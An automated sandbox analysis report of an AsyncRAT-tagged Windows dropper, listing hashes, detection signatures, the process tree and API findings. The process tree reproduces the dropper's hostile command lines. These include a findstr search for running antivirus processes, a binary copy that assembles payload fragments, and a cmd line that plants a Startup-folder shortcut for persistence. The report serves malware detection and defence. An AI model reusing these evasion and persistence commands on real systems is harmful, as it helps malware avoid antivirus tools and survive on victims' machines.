Windows Analysis Report
C3KzPHU3UG.exe

Overview

General Information

Sample name: C3KzPHU3UG.exe (renamed because original name is a hash value)
Original sample name: b1202e7766f87458e7bbee5a2b2103ca.exe
Analysis ID: 1502253
MD5: b1202e7766f87458e7bbee5a2b2103ca
SHA1: a1e2d3d973fc37992a07668ab024f5df81e1545a
SHA256: 48a4042854a402824d35f4c95aed1e448d652d79ed0c251635acbc073200dfcf
Tags: AsyncRAT, exe, RAT

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • C3KzPHU3UG.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\C3KzPHU3UG.exe" MD5: B1202E7766F87458E7BBEE5A2B2103CA)
    • cmd.exe (PID: 7696 cmdline: "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7756 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7764 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7828 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7836 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7872 cmdline: cmd /c md 585723 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7888 cmdline: findstr /V "TranscriptHousesConstitutesMedicaid" Hate MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7904 cmdline: cmd /c copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Designing.pif (PID: 7920 cmdline: Designing.pif F MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • cmd.exe (PID: 7952 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & echo URL="C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7936 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 8072 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • EchoSync.pif (PID: 8116 cmdline: "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif" "C:\Users\user\AppData\Local\SyncTech Innovations\p" MD5: C56B5F0201A3B3DE53E561FE76912BFD)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , ProcessId: 8072, ProcessName: wscript.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: Designing.pif F, CommandLine: Designing.pif F, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\585723\Designing.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\585723\Designing.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\585723\Designing.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7696, ParentProcessName: cmd.exe, ProcessCommandLine: Designing.pif F, ProcessId: 7920, ProcessName: Designing.pif
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , ProcessId: 8072, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7952, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7696, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 7836, ProcessName: findstr.exe
No Suricata rule has matched

AV Detection

Source: C3KzPHU3UG.exe | ReversingLabs: Detection: 33%
Source: C3KzPHU3UG.exe | Virustotal: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.7% probability
Source: C3KzPHU3UG.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Code function: 0_2_00405B98 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Code function: 0_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Code function: 0_2_004029F1 FindFirstFileW
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006F4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006F494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FCD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006FFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_006F3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\585723\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\585723
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: unknown | DNS traffic detected: query: XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF reply code: Name error (3)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00BA29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | DNS traffic detected: DNS query: XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF
Source: C3KzPHU3UG.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: C3KzPHU3UG.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: C3KzPHU3UG.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: C3KzPHU3UG.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: C3KzPHU3UG.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: C3KzPHU3UG.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: C3KzPHU3UG.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: C3KzPHU3UG.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: C3KzPHU3UG.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: C3KzPHU3UG.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C3KzPHU3UG.exe | String found in binary or memory: http://ocsp.digicert.com0
Source: C3KzPHU3UG.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: C3KzPHU3UG.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: C3KzPHU3UG.exe | String found in binary or memory: http://ocsp.digicert.com0X
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: C3KzPHU3UG.exe, 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif, 0000000A.00000000.1685729671.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp, EchoSync.pif, 0000000F.00000002.2896500055.0000000000759000.00000002.00000001.01000000.00000008.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: C3KzPHU3UG.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Statute.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.dr | String found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\C3KzPHU3UG.exe | Code function: 0_2_00404BB4 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00BA4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_00704830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00BA4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00B90508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pif | Code function: 10_2_00BBD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif | Code function: 15_2_0071D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B942D5: CreateFileW,DeviceIoControl,CloseHandle,10_2_00B942D5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B88F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00B88F2E
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00403415 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403415
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B95778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00B95778
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006F5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_006F5778
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_0040447D0_2_0040447D
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_0040680A0_2_0040680A
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00406E340_2_00406E34
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B3B02010_2_00B3B020
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B394E010_2_00B394E0
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B39C8010_2_00B39C80
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B523F510_2_00B523F5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BB840010_2_00BB8400
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B6650210_2_00B66502
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B3E6F010_2_00B3E6F0
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B6265E10_2_00B6265E
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5282A10_2_00B5282A
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B689BF10_2_00B689BF
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BB0A3A10_2_00BB0A3A
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B66A7410_2_00B66A74
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B40BE010_2_00B40BE0
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B8EDB210_2_00B8EDB2
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5CD5110_2_00B5CD51
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BB0EB710_2_00BB0EB7
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B98E4410_2_00B98E44
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B66FE610_2_00B66FE6
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B533B710_2_00B533B7
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5F40910_2_00B5F409
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B4D45D10_2_00B4D45D
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B516B410_2_00B516B4
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B3F6A010_2_00B3F6A0
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B4F62810_2_00B4F628
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B3166310_2_00B31663
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B578C310_2_00B578C3
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5DBA510_2_00B5DBA5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B51BA810_2_00B51BA8
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B69CE510_2_00B69CE5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B4DD2810_2_00B4DD28
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5BFD610_2_00B5BFD6
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B51FC010_2_00B51FC0
